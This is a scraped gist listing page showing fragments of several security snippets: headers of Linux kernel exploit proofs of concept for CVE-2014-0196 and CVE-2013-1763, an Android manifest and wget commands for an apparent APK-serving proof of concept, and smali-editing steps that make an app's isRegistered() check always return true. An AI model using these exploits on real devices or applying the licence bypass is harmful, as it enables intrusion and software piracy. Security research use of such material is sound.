O-LLVM + Overclok's Kryptonite Obfuscation with Android NDK.
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
/* CVE-2014-0196 DOS PoC [Written May 5th, 2014] | |
* by DigitalCold <digitalcold0@gmail.com> | |
* | |
* Note: this crashes my i686 Gentoo system running 3.12.14 | |
* and an old Backtrack 5r3 running 3.2.6. Any advice on how to gain | |
* code exec would be greatly appreciated. | |
* | |
* Usage: gcc -O2 -o pty pty.c -lutil && ./pty | |
* | |
* CVE: http://people.canonical.com/~ubuntu-security/cve/2014/CVE-2014-0196.html |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
[ 0.000000] Linux version 4.5.0-rc2+ (fuzion24@bitbox) (gcc version 6.0.0 20160221 (experimental) (GCC) ) #4 SMP Mon Feb 22 14:12:37 EST 2016 | |
[ 0.000000] Command line: root=/dev/sda | |
[ 0.000000] x86/fpu: Legacy x87 FPU detected. | |
[ 0.000000] x86/fpu: Using 'lazy' FPU context switches. | |
[ 0.000000] e820: BIOS-provided physical RAM map: | |
[ 0.000000] BIOS-e820: [mem 0x0000000000000000-0x000000000009fbff] usable | |
[ 0.000000] BIOS-e820: [mem 0x000000000009fc00-0x000000000009ffff] reserved | |
[ 0.000000] BIOS-e820: [mem 0x00000000000f0000-0x00000000000fffff] reserved | |
[ 0.000000] BIOS-e820: [mem 0x0000000000100000-0x000000007fffdfff] usable | |
[ 0.000000] BIOS-e820: [mem 0x000000007fffe000-0x000000007fffffff] reserved |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
package com.test.rootchecker; | |
import java.io.File; | |
import java.util.List; | |
import java.util.Map; | |
import android.content.Context; | |
import android.content.pm.ApplicationInfo; | |
public class RootChecker { |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#! /bin/sh | |
#Opens Chrome canary (or Chromium or w/e CHROME_PATH points to) in igcognito mode. | |
#Uses very popular user agent | |
#Sets Tor as the socks proxy | |
CHROME_PATH="/Applications/Google Chrome Canary.app/Contents/MacOS/Google Chrome Canary" | |
tor &> /dev/null & \ |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
/* | |
* CVE-2013-1763 SOCK_DIAG bug in kernel 3.3-3.8 | |
* | |
* Ported by fuzion24 | |
* | |
* Tested on Nexus 4 | |
* cshell@mako:/ $ cat /proc/version | |
* Linux version 3.4.0-perf-gf43c3d9 (android-build@vpbs1.mtv.corp.google.com) (gcc version 4.6.x-google 20120106 (prerelease) (GCC) ) #1 SMP PREEMPT Mon Jun 17 16:55:05 PDT 2013 | |
* shell@mako:/data/local/tmp $ ./diag_sock_exploit | |
* Sock diag handlers c11d8048 |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
<?xml version="1.0" encoding="utf-8"?> | |
<manifest xmlns:android="http://schemas.android.com/apk/res/android" | |
package="com.packagemanager.poc" | |
android:versionCode="1" | |
android:versionName="1.0" > | |
<uses-sdk android:minSdkVersion="8" /> | |
<uses-permission android:name="android.permission.INSTALL_PACKAGES" /> | |
<uses-permission android:name="android.permission.DELETE_PACKAGES" /> |
wget https://gist.githubusercontent.com/Fuzion24/6dd7552a1c594911416f/raw/server.rb
wget https://s3.amazonaws.com/uploads.hipchat.com/35420/441986/5xRGtuTBdBnuisN/twitter.apk
gem install sinatra --no-rdoc
ruby server.rb ./twitter.apk
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Running apktool d APKNAME.apk will result in output that can be modified and later repackaged and ran. | |
isRegistered() is hardcoded to return false. | |
Changing | |
const/4 v0, 0x0 | |
to | |
const/4 v0, 0x1 | |
will cause isRegistered to ALWAYS return true. Thus always telling the application that it is registered. |
OlderNewer